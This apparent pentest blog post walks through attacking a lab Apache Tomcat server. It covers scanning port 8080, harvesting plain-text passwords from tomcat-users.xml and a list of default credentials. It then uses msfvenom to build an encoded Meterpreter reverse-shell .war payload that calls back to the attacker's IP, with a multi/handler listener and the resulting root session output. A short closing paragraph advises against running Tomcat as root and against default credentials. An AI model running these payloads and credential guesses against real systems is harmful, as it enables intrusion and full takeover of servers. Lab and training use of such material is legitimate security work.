White Box Testing Tomcat and Struts

Tomcat is always an easy target and low hanging fruit in a pentest and I always aim to scan the network for port 8080 as tomcat runs by default on this port.
If you are lucky enough, you can login to the “Manager App” with default credentials and upload a .war file to get shell on the machine.
Pentest is having a methodology and knowing your way. If you successfully own a machine, make sure to have some more passwords

In this post, I will install Tomcat to my Ubuntu machine and check for possible attack vectors and check the configuration files.

There can be also some Struts application installed and they may be vulnerable as well.
Please see the link here to install Tomcat and Struts to Ubuntu.

Please note that the locations can be vary depending on the location you are installing.
Tomcat installation can be found here in my case:

/usr/local/tomcat

After the installation is complete, let’s dig some config files : 

usr/local/tomcat/conf/

Default port of the Tomcat can be found under:

/usr/local/tomcat/conf/server.xml

In order to find the config file to change & find the default port, you may simply grep “8080”

low@vm:/usr/local/tomcat/conf$ grep -rnw . -e "8080"
./server.xml:67: Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
./server.xml:69: ./server.xml:75: port="8080" protocol="HTTP/1.1"
./server.xml:75: port="8080" protocol="HTTP/1.1"
low@vm:/usr/local/tomcat/conf$

Alright, since it is running on port 8080, let’s check how the service looks like from nmap output:

[email protected]:~# nmap -p 8080 -sV 192.168.207.178
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-16 03:31 EST
Nmap scan report for 192.168.207.178
Host is up (0.00074s latency).

PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat 9.0.0.M26
MAC Address: X.X.X.X

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
[email protected]:~#

Let’s send a request to port 8080. We can verify that tomcat is ready.

[email protected]:~# curl http://192.168.207.178:8080/ | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11236 0 11236 0 0 1219k 0 --:--:-- --:--:-- --:--:-- 1219k

Home Documentation Configuration Examples Wiki Mailing_Lists Find_Help
****** Apache Tomcat/9.0.0.M26 ******
***** If you're seeing this, you've successfully installed Tomcat.
Congratulations! *****

...SNIP...

The most interesting part for Tomcat is you can find the credentials in the tomcat-users.xml config file. Imagine that you access a machine and see that Tomcat is running in the loopback, you may just go and grab the plain-text passwords from there.

The structure is similar to Jenkins as the credentials for both applications can be found under the .xml files. For more information, please visit the Jenkins post here.

low@vm:/usr/local/tomcat/conf$cat tomcat-users.xml
<!--?xml version="1.0" encoding="UTF-8"?-->
...SNIP...
<role rolename="manager-gui" />
<user username="admin" password="admin" roles="manager-gui,tomcat,admin-gui"/>
...SNIP...
low@vm:/usr/local/tomcat/conf$

The username and password can be easily noticed. admin-admin
More information regarding the roles in Tomcat, please see the Tomcat 9 documentation here.

The password can be used in order to access to the “Manager App”. As soon as you click to the “Manager App”, you will be asked to credentials.
HTTP response is 401. If you fuzz the application for additional directories to access manager directory: http://192.168.207.178:8080/manager/html, you will have 401 error.

Key Directories of Tomcat

/manager
/manager/status

Default credentials

tomcat:tomcat
tomcat:s3cret
admin:admin
admin:
admin:password
tomcat:tomcat1
manager:manager

Exploiting Apache Tomcat

We are in if the administrator of Tomcat uses default credentials.
You will see a page like this:

How to Deploy .war File to Tomcat

You can deploy malicious .war files either using the URL or simply uploading the file from your local machine.
Using our Kali Linux machine, we can easily generate a .war file with the help of msfvenom. We will upload this file and get a reverse shell from Tomcat.

Our Kali(attacking) IP is: 192.168.207.176

[email protected]:~# msfvenom -p java/meterpreter/reverse_tcp -f war -e x86/shikata_ga_nai LHOST=192.168.207.176 LPORT=443 -o shell.war

You may also try to use java/meterpreter/reverse_https payload which can help bypassing some security configurations.

Here it is a good writeup to evading antivirus post as well.

Let’s listen the shell:

root@kali:~/Desktop# msfconsole -q -x 'use multi/handler;
> set PAYLOAD java/meterpreter/reverse_tcp;
> set LHOST 192.168.207.176;
> set LPORT 443;
> run'

As soon as you deploy the shell.war, you should see it under Applications section of Tomcat interface.

Once you click the /shell, you receive a meterpreter shell or either you can simply use curl.Both will do the same trick and we will get our lovely shell.

[email protected]:~# curl http://192.168.207.178:8080/shell

Getting Shell

PAYLOAD => java/meterpreter/reverse_tcp
LHOST => 192.168.207.176
LPORT => 443
[*] Started reverse TCP handler on 192.168.207.176:443
[*] Sending stage (53845 bytes) to 192.168.207.178
[*] Meterpreter session 1 opened (192.168.207.176:443 -> 192.168.207.178:47278) at 2018-11-16 08:07:39 -0500

meterpreter > getuid
Server username: root
meterpreter >

That’s really bad as we have installed the Tomcat as root user 🙁
But we got a shell as root, isn’t it nice ? 🙂

I therefore do not recommend installing tomcat as root and also always try to use more complex passwords for your applications. Never ever use default credentials.

Keep following, I will attack struts and update the post here.

Leave a Comment